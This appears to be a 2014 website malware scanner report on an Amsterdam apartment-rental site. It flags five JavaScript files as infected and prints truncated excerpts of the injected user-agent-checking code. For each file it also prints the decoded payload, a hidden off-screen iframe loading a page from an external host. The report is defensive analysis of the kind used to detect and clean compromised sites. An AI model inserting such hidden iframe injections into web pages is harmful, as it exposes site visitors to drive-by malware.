Scanned pages/files
Request | Server response | Status |
http://www.appartementen-amsterdam-visseringstaete.com/ | 200 OK Content-Length: 16997 Content-Type: text/html | clean |
http://www.appartementen-amsterdam-visseringstaete.com/media/system/js/caption.js | 200 OK Content-Length: 3800 Content-Type: application/x-javascript | clean |
http://www.appartementen-amsterdam-visseringstaete.com/plugins/content/avreloaded/silverlight.js | 200 OK Content-Length: 9930 Content-Type: application/x-javascript | clean |
http://www.appartementen-amsterdam-visseringstaete.com/plugins/content/avreloaded/wmvplayer.js | 200 OK Content-Length: 18313 Content-Type: application/x-javascript | clean |
http://www.appartementen-amsterdam-visseringstaete.com/plugins/content/avreloaded/swfobject.js | 200 OK Content-Length: 14091 Content-Type: application/x-javascript | clean |
http://www.appartementen-amsterdam-visseringstaete.com/plugins/content/avreloaded/avreloaded.js | 200 OK Content-Length: 4196 Content-Type: application/x-javascript | clean |
http://www.appartementen-amsterdam-visseringstaete.com/modules/mod_news_show_gk2/scripts/engine.js | 200 OK Content-Length: 5470 Content-Type: application/x-javascript | malicious |
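Malicious code - confirmed by antivirus engines (see "Antivirus reports" below; the per-engine results are missing from this copy). The excerpt is abridged: it breaks off inside the user-agent array and resumes later in the file. The same leading block (stripos, see_user_agent) opens every file flagged malicious in this report. (function(){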
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var bebmain = 0; if ((bebmain = haystack.indexOf(needle, f_offset)) !== -1) { return bebmain; } return false; } function see_user_agent(){ var replace_user_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','Fre NV--; $E('.gk_news_show_panel_amount_value',el).setHTML(NR-NV); Cookie.set('gk_news_show_amount'+TID, (NR-NV), {duration: 14,path: "/"}); if(list){ for(var k=0;k<NC;k++){ if(((NR-NV)*NC)-(1+k) < amountOfLi) listOfLi[((NR-NV)*NC)-(1+k)].setStyle('display','none'); } } } }); } } }); }); Decoded script: <iframe src="http://river.xdecor.eu/jfstrjarrdgfjrthdfherh12.html" style="position:absolute;left:-1155px;top:-1155px;" height="129" width="129"></iframe> Antivirus reports:
| ||
http://www.appartementen-amsterdam-visseringstaete.com/modules/mod_gk_news_image_5/js/engine.js | 200 OK Content-Length: 8131 Content-Type: application/x-javascript | malicious |
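Malicious code - confirmed by antivirus engines (see "Antivirus reports" below; the per-engine results are missing from this copy). The excerpt is abridged: it breaks off inside the user-agent array and resumes later in the file. (function(){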
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var bebmain = 0; if ((bebmain = haystack.indexOf(needle, f_offset)) !== -1) { return bebmain; } return false; } function see_user_agent(){ var replace_user_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','Fre if(!play) this.image_pause($G); if((play || $G["autoanim"] == 1) && ($G["actual_anim"] == false)){ $G["actual_anim"] = (function(){ n = (n < max) ? n+1 : 0; $this.image_anim(elID,mainwrap,wrap,slides,n,contents,$G,true); }).periodical($G["anim_speed"]*2+$G["anim_interval"]); } } }, image_pause : function($G){ $clear($G["actual_anim"]); $G["actual_anim"] = false; } }); Decoded script: <iframe src="http://river.xdecor.eu/jfstrjarrdgfjrthdfherh12.html" style="position:absolute;left:-1155px;top:-1155px;" height="129" width="129"></iframe> Antivirus reports:
| ||
http://www.appartementen-amsterdam-visseringstaete.com/modules/mod_gk_news_image_5/js/importer.php?mid=news_image_5_1&animation_slide_speed=1000&animation_interval=5000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=000000&text_block_opacity=0.45 | 200 OK Content-Length: 219 Content-Type: text/javascript | clean |
http://www.appartementen-amsterdam-visseringstaete.com/templates/gk_gomuproject/lib/scripts/template_scripts.js | 200 OK Content-Length: 3782 Content-Type: application/x-javascript | malicious |
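Malicious code - confirmed by antivirus engines (see "Antivirus reports" below; the per-engine results are missing from this copy). The excerpt is abridged: it breaks off inside the user-agent array and resumes later in the file. (function(){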
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var bebmain = 0; if ((bebmain = haystack.indexOf(needle, f_offset)) !== -1) { return bebmain; } return false; } function see_user_agent(){ var replace_user_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','Fre if(h > max_height) max_height = h; }); $ES('.users', $('bottom_wrap')).each(function(el, i){ el.getChildren()[0].setStyle("height", max_height+"px"); }); } }); function changeStyle(style){ var file = template_path+'/css/style'+style+'.css'; new Asset.css(file); new Cookie.set('gk16_style',style,{duration: 200,path: "/"}); actual_style = style; } Decoded script: <iframe src="http://river.xdecor.eu/jfstrjarrdgfjrthdfherh12.html" style="position:absolute;left:-1155px;top:-1155px;" height="129" width="129"></iframe> Antivirus reports:
| ||
http://www.appartementen-amsterdam-visseringstaete.com/templates/gk_gomuproject/lib/scripts/jmenu_2.js | 200 OK Content-Length: 3723 Content-Type: application/x-javascript | malicious |
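Malicious code - confirmed by antivirus engines (see "Antivirus reports" below; the per-engine results are missing from this copy). The excerpt is abridged: it breaks off inside the user-agent array and resumes later in the file. (function(){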
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var bebmain = 0; if ((bebmain = haystack.indexOf(needle, f_offset)) !== -1) { return bebmain; } return false; } function see_user_agent(){ var replace_user_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','Fre levels.each(function(e,k){ e.each(function(a,l){ a.addEvent("mouseenter",function(){ a.getChildren()[1].setStyle("overflow","hidden"); effects2[k][l].toggle(); (function(){a.getChildren()[1].setStyle("overflow","")}).delay(500); }); a.addEvent("mouseleave",function(){ a.getChildren()[1].setStyle("overflow","hidden"); effects2[k][l].stop(); effects2[k][l].set(0); }); }); }); }); Decoded script: <iframe src="http://river.xdecor.eu/jfstrjarrdgfjrthdfherh12.html" style="position:absolute;left:-1155px;top:-1155px;" height="129" width="129"></iframe> Antivirus reports:
| ||
http://www.appartementen-amsterdam-visseringstaete.com/templates/gk_gomuproject/lib/scripts/ie.js | 200 OK Content-Length: 2227 Content-Type: application/x-javascript | malicious |
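Malicious code - confirmed by antivirus engines (see "Antivirus reports" below; the per-engine results are missing from this copy). The excerpt is abridged: it breaks off inside the user-agent array and resumes later in the file. In the decoded output, the sfHover menu handler also appears in the excerpt of the file itself; the off-screen iframe is the part that matches the other flagged files. (function(){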
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var bebmain = 0; if ((bebmain = haystack.indexOf(needle, f_offset)) !== -1) { return bebmain; } return false; } function see_user_agent(){ var replace_user_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','Fre } }; })(); sfHover = function() { var sfEls = document.getElementById("horiz-menu").getElementsByTagName("LI"); for (var i=0; i<sfEls.length; i++) { sfEls[i].onmouseover=function() { this.className+=" sfHover"; } sfEls[i].onmouseout=function() { this.className=this.className.replace(new RegExp(" sfHover\\b"), ""); } } } if (window.attachEvent) window.attachEvent("onload", sfHover); Decoded script: function () { var sfEls = document.getElementById("horiz-menu").getElementsByTagName("LI"); for (var i = 0; i < sfEls.length; i++) { sfEls[i].onmouseover = function () {this.className += " sfHover";}; sfEls[i].onmouseout = function () {this.className = this.className.replace(new RegExp(" sfHover\\b"), "");}; } } <iframe src="http://river.xdecor.eu/jfstrjarrdgfjrthdfherh12.html" style="position:absolute;left:-1155px;top:-1155px;" height="129" width="129"></iframe> Antivirus reports:
| ||
http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit | 200 OK Content-Length: 1475 Content-Type: text/javascript | clean |
http://connect.facebook.net/en_US/all.js | 200 OK Content-Length: 166991 Content-Type: application/x-javascript | clean |
http://www.booking.com/general.html?tmpl=bookit;aid=330843;lang=en;hotel_id=251788;pb=1 | HTTP/1.1 301 Moved Permanently Date: Sat, 21 Jun 2014 14:53:10 GMT Location: http://www.booking.com/general.html?tmpl=bookit Server: nginx X-Cnection: close X-Recruiting: Like HTTP headers? Come write ours: https://workingatbooking.com X-UA-Compatible: IE=edge | clean |
http://www.booking.com/general.html?tmpl=bookit | HTTP/1.1 301 Moved Permanently Date: Sat, 21 Jun 2014 14:53:10 GMT Location: http://www.booking.com/general.html Server: nginx X-Cnection: close X-Recruiting: Like HTTP headers? Come write ours: https://workingatbooking.com X-UA-Compatible: IE=edge | clean |
http://www.booking.com/general.html | HTTP/1.1 200 OK Date: Sat, 21 Jun 2014 14:53:10 GMT Server: nginx Vary: User-Agent, Accept-Encoding Content-Length: 227 Content-Type: text/html; charset=UTF-8 X-Cnection: close X-Recruiting: Like HTTP headers? Come write ours: https://workingatbooking.com X-UA-Compatible: IE=edge | clean |
http://www.booking.com/index.html | HTTP/1.1 301 Moved Permanently Date: Sat, 21 Jun 2014 14:53:11 GMT Location: http://www.booking.com/ Server: nginx X-Cnection: close X-Recruiting: Like HTTP headers? Come write ours: https://workingatbooking.com X-UA-Compatible: IE=edge | clean |
http://www.booking.com/ | 200 OK Content-Length: 183436 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: appartementen-amsterdam-visseringstaete.com
Result: (response not shown in this copy)
Second query (visit from search engine):
GET / HTTP/1.1
Host: appartementen-amsterdam-visseringstaete.com
Referer: http://www.google.com/search?q=appartementen-amsterdam-visseringstaete.com
Result:
The result is similar to the first query. There are no suspicious redirects found. This check covers HTTP-level redirects only: the files flagged above insert an off-screen iframe from script, which is not a redirect, so this result does not contradict the malicious verdicts. Both queries, as shown, differ only in the Referer header, while the flagged excerpts contain a user-agent list (see_user_agent), so any behaviour that depends on the visitor's User-Agent is not exercised here.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=appartementen-amsterdam-visseringstaete.com
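Result: This site is not currently listed as suspicious. Not being listed does not contradict the malicious files reported above: a blacklist reflects what its operator has detected so far, not the current content of the site's files.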
Query: http://yandex.com/infected?l10n=en&url=http://appartementen-amsterdam-visseringstaete.com/
Result: appartementen-amsterdam-visseringstaete.com is not infected or malware details are not published yet.